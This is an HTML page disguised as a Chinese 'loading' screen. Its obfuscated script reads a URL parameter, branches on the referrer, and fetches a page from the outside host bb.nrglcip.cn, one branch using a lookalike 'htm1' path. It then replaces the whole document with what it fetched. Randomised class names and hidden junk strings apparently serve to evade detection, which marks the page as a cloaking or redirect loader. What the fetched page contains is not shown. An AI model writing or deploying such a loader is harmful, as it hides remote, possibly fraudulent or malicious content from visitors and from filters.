<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Khd3CU {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Khd3CU .p7TgVheSJ {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Khd3CU .content {
            line-height: 50px;
            text-align: center
        }

        .Khd3CU .img {
            width: 100%
        }

        .Khd3CU .K2M4sgTu {
            text-align: center
        }

        .Khd3CU .K2M4sgTu span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Khd3CU .K2M4sgTu span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Khd3CU .K2M4sgTu span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Khd3CU .K2M4sgTu span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Khd3CU .K2M4sgTu span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Khd3CU .K2M4sgTu span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Khd3CU .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function FGXwdgj4gcVCH(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var jEI3h = FGXwdgj4gcVCH('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ jEI3h +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ jEI3h +".html?a=share";
		}
		
        P45rm0k=url+"#"+new Date().getTime();
        P45rm0k && function() {
            $.get(P45rm0k, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>cGofxtvkahC3NttyHnQdwrw7Bt5gurRTkB5</div>
<ul style='display:none' >jqFSNnEXt6dKM361KUEElQzHSK5OHSvylH3e8NrUNdx2p0avdJhaunlreibGD</ul>
<div style='display:none'>cGofxtvkahC3NttyHnQdwrw7Bt5gurRTkB5</div>
<ul style='display:none' >jqFSNnEXt6dKM361KUEElQzHSK5OHSvylH3e8NrUNdx2p0avdJhaunlreibGD</ul><div class="Khd3CU">
    <div class="p7TgVheSJ">
        <div class="K2M4sgTu">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<img  src='' style='display:none'>
<ul style='display:none' >hFs8cmJ8POnJL31B0NrB8g7SlHSK9ytQnnQ76c898wJkGw4odkycOAVXCq</ul></body>
</html>